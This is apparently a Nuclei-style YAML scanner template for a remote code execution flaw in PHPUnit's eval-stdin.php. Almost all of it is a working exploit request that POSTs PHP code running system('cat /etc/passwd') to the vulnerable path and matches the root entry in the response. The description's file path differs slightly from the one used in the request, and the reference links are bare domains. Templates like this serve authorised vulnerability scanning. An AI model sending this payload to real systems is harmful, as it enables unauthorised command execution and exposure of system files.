id: rce-phpunit-eval-stdin
info:
  name: PHPUnit RCE Exploit
  author: darkskull7
  severity: critical
  description: |
    This template exploits a Remote Code Execution (RCE) vulnerability in PHPUnit.
    The issue is located in /vendor/phpunit/phpunit/Utils/PHP/eval-stdin.php where
    arbitrary PHP code can be executed via POST request.
  reference:
    - https://cve.mitre.org
    - https://github.com
  tags: rce, phpunit, exploit

requests:
  - method: POST
    path:
      - "{{BaseURL}}/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"

    body: "<?php system('cat /etc/passwd'); ?>"

    matchers:
      - type: word
        words:
          - "0:0:root"
          - "daemon"
        part: body
